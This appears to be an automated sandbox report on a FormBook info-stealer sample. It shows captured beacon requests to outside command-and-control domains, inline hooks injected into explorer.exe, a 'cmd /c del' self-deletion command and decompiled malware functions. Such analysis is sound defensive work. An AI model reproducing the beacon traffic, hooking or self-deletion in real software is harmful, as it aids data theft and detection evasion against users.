Mar 20, 2023 09:13:18.759357929 CET	8.8.8.8	192.168.2.6	0x9ab2	Name error (3)	www.quickhealcareltd.co.uk	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.kellnovaglobalfood.info

www.controlplus.systems

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49707	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:12:27.000046968 CET	100	OUT	GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1 Host: www.kellnovaglobalfood.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:12:27.245915890 CET	101	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 20 Mar 2023 08:12:27 GMT Content-Type: text/html Content-Length: 291 ETag: "64063330-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49708	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:12:47.491030931 CET	102	OUT	GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1 Host: www.controlplus.systems Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:12:47.672036886 CET	103	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 20 Mar 2023 08:12:47 GMT Content-Type: text/html Content-Length: 291 ETag: "63fcb05a-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE1
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE1
GetMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE1
GetMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE1

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 7pECKdsaig.exePID: 6000, Parent PID: 3452

General

Target ID:	0
Start time:	09:11:04
Start date:	20/03/2023
Path:	C:\Users\user\Desktop\7pECKdsaig.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\7pECKdsaig.exe
Imagebase:	0xa80000
File size:	185856 bytes
MD5 hash:	515BF958F062FEC724FBE6BDADF39485
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 6000

General

Target ID:	1
Start time:	09:11:06
Start date:	20/03/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff647860000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msdt.exePID: 5148, Parent PID: 3452

General

Target ID:	2
Start time:	09:11:16
Start date:	20/03/2023
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msdt.exe
Imagebase:	0xb60000
File size:	1508352 bytes
MD5 hash:	7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1328, Parent PID: 5148

General

Target ID:	8
Start time:	09:11:25
Start date:	20/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\7pECKdsaig.exe"
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3660, Parent PID: 1328

General

Target ID:	9
Start time:	09:11:25
Start date:	20/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 7pECKdsaig.exePID: 6000, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	2.8%
Signature Coverage:	5.9%
Total number of Nodes:	563
Total number of Limit Nodes:	64

Executed Functions

Function 00A8ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A8ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E00A9CC40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00A9D060(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00A9D2E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00A9B490(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00a8ace9
0x00a8acfc
0x00a8acff
0x00a8ad04
0x00a8ad09
0x00a8ad13
0x00a8ad18
0x00a8ad1b
0x00a8ad1d
0x00a8ad25
0x00a8ad2a
0x00a8ad2a
0x00a8ad31
0x00a8ad39
0x00a8ad3c
0x00a8ad3e
0x00a8ad52
0x00000000
0x00a8ad54
0x00a8ad5a
0x00a8ad0e
0x00a8ad0e
0x00a8ad0e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A8AD52

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 9c4a0b7406a08fba48b912f08853abb1a43126f7fab7e228c5b72b6caf7b635f
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 730171B5E4020DABDF10EBE4DD42FDDB3B89B54308F0081A5E90997241F670EB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A9A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00A9AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00a9a35f
0x00a9a367
0x00a9a39d
0x00a9a3a1

APIs

NtCreateFile.NTDLL(00000060,00A89CE3,?,00A94BA7,00A89CE3,FFFFFFFF,?,?,FFFFFFFF,00A89CE3,00A94BA7,?,00A89CE3,00000060,00000000,00000000), ref: 00A9A39D

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 107bc1d842834a2d8c56a1d27f0857036bd432baf7efd50165dba47c90052602
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 8FF0BDB2200208AFCB08CF88DC85EEB77EDAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A3FB Relevance: 1.5, APIs: 1, Instructions: 38
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00A9A3FB(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v117;
				void* _t26;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;
				void* _t41;

				_v117 = _v117 & __eax % __eax;
				_t21 = _a4;
				_t39 = _a4 + 0xc48;
				E00A9AF50(_t37, _a4, _t39,  *((intOrPtr*)(_t21 + 0x10)), 0, 0x2a);
				_t26 =  *((intOrPtr*)( *_t39))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t38, _t41); // executed
				return _t26;
			}

0x00a9a3ff
0x00a9a403
0x00a9a40f
0x00a9a417
0x00a9a445
0x00a9a449

APIs

NtReadFile.NTDLL(00A94D62,5EB65239,FFFFFFFF,00A94A21,?,?,00A94D62,?,00A94A21,FFFFFFFF,5EB65239,00A94D62,?,00000000), ref: 00A9A445

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c2592db80ceeb37e60fda3b8bb2279dc7aab3c7406d4957bce4178abfe595ee2
Instruction ID: 3ab8cb3b9e2a41a3223fca50b4c8863ed710d19b0fb585dcdef6cb963ed3171e
Opcode Fuzzy Hash: c2592db80ceeb37e60fda3b8bb2279dc7aab3c7406d4957bce4178abfe595ee2
Instruction Fuzzy Hash: 11F0E2B6200108AFCB14DF99CC90EEB77A9EF8C354F158248FA1DE7251C630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A400 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00A9A400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00A9AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x00a9a403
0x00a9a40f
0x00a9a417
0x00a9a445
0x00a9a449

APIs

NtReadFile.NTDLL(00A94D62,5EB65239,FFFFFFFF,00A94A21,?,?,00A94D62,?,00A94A21,FFFFFFFF,5EB65239,00A94D62,?,00000000), ref: 00A9A445

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 0b3204c0b477f2001504db8dc3803d81f0a7e14c9cd7efe3d25e3158496971fd
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: D6F0A4B6200208AFCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A9A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00A9AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00a9a53f
0x00a9a547
0x00a9a569
0x00a9a56d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00A9B124,?,00000000,?,00003000,00000040,00000000,00000000,00A89CE3), ref: 00A9A569

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 87b998390d9c52249b0385484a0b4205d31920e41bc54dedcf520834333e5ff3
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 36F015B6200208AFCB14DF89CC81EAB77ADAF88754F118149BE1C97241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A47A Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A9A47A(void* __eax, void* __ebx, void* __ecx, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t17;

				 *(__ebx - 0x74aaf397) =  *(__ebx - 0x74aaf397) | __ecx + __eax;
				_t8 = _a4;
				_t4 = _t8 + 0x10; // 0x300
				_t5 = _t8 + 0xc50; // 0xa8a933
				E00A9AF50(_t17, _a4, _t5,  *_t4, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}

0x00a9a47c
0x00a9a483
0x00a9a486
0x00a9a48f
0x00a9a497
0x00a9a4a5
0x00a9a4a9

APIs

NtClose.NTDLL(00A94D40,?,?,00A94D40,00A89CE3,FFFFFFFF), ref: 00A9A4A5

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
